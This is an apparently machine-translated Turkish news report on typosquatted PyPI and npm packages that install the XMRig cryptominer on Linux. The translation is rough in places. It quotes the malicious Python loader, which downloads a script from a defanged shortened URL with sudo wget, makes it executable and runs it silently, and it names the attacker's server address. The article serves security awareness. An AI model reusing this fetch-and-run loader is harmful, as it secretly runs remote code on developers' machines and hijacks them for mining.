Bu hafta PyPI ve npm açık kaynak kayıtlarına sızan 200’den fazla kötü amaçlı paket keşfedildi.
Bu paketler büyük ölçüde yaygın olarak kullanılan kitaplıkların yazım hatalarıdır ve her biri kripto madencileri çalıştıran Linux sistemlerinde bir Bash betiği indirir.
PyPI, npm kripto madenciliği paketleriyle dolup taştı
Araştırmacılar, Linux makinelerine bulaştıktan sonra kripto madencilerini düşüren en az 241 kötü niyetli npm ve PyPI paketi yakaladı.
Bu paketler, popüler açık kaynak kitaplıklarının ve aşağıdaki gibi komutların yazım hatalarıdır: Tepki, tartışmave AIOHTTPancak bunun yerine, tehdit aktörünün sunucusundan kripto madenciliği Bash komut dosyalarını indirip yükleyin.
Çarşamba günü, yazılım geliştirici ve araştırmacı Hauke Lübbers paylaşılıyor”en az 33 proje” tüm başlatılan PyPI’de XMRigaçık kaynaklı bir Monero kripto madenci, bir sisteme bulaştıktan sonra.
Araştırmacı, bu 33 kötü amaçlı projeyi PyPI yöneticilerine bildirme sürecindeyken, tehdit aktörünün aynı kötü amaçlı yüke sahip başka bir 22 paket seti yayınlamaya başladığını fark etti.
Lübbers, BleepingComputer’a “Onları PyPI’ye bildirdikten sonra hızla silindiler – ancak kötü niyetli aktör hala daha fazla paket yükleme sürecindeydi ve 22 tane daha yükledi” dedi.
Yazılım mühendisi, “Paketler Linux sistemlerini hedef aldı ve kripto madenciliği yazılımı XMRig’i kurdu” diye açıklıyor.
Python paketleri, Bit.ly URL kısaltıcı aracılığıyla tehdit aktörünün sunucusundan Bash komut dosyasını indiren aşağıdaki kod parçasını içerir.
os.system(“sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1”)
os.system(“chmod +x .cmc >/dev/null 2>&1”)
os.system(“./.cmc >/dev/null 2>&1”)
Araştırmacı Bit’i açıklıyor[.]ly URL, 80.78.25’te barındırılan komut dosyasına yönlendirir[.]140:8000.
“Bu, Bash betiğini şuradan indirip yürüterek yapıldı. http://80.78.25[.]140:8000/.cmc”
Yürütme üzerine, komut dosyası, güvenliği ihlal edilen ana bilgisayarın IP adresini ve kripto madencilerinin dağıtımının başarılı olup olmadığını tehdit aktörüne bildirir.
Yazma sırasında, BleepingComputer IP adresinin kapalı olduğunu gözlemledi. Ancak, BleepingComputer betiğin bir kopyasını elde edebildi ve biz de araştırmacının iddialarını doğrulayabildik:
Bir parçası olduğum Sonatype güvenlik araştırma ekibi, ifşa bir diğer 186 npm yazım hatası paketleri bugün kötü niyetli Bash betiğini indirmek için aynı URL ile bağlantı kuruyor.
Görünüşe göre, her iki kayıt da geliştiricilere daha fazla zarar vermeden önce yazım hatalarını platformlarından oldukça hızlı bir şekilde temizledi.
gibi çeşitli güvenlik geliştirmelerine rağmen kritik projeler için iki faktörlü kimlik doğrulamayı zorunlu kılmak ve yeni özelliklerin tanıtılması (Python’unki gibi setuptools, setup.py’yi değiştirmeye doğru ilerliyor), açık kaynak deposunun tehdit aktörlerine karşı yarışı daha da zorlaşıyor gibi görünüyor.
Geçen hafta, yazılım güvenlik şirketi Checkmarx bir düzine kötü niyetli Python paketi keşfettiğini bildirdi. Counter-Strike sunucularında DDoS saldırıları gerçekleştirmek.
Bu ayın başlarında, siber güvenlik firması CheckPoint 10 kötü amaçlı PyPI paketi çıktı geliştirici kimlik bilgilerini çalarken yakalandı.
Temmuz ayında, ReversingLabs araştırmacıları, bir tedarik zinciri saldırısını ifşa etti. Simge Patlaması bu bir kez daha, geliştiricilere bulaşmak için yazım hatasından yararlandı.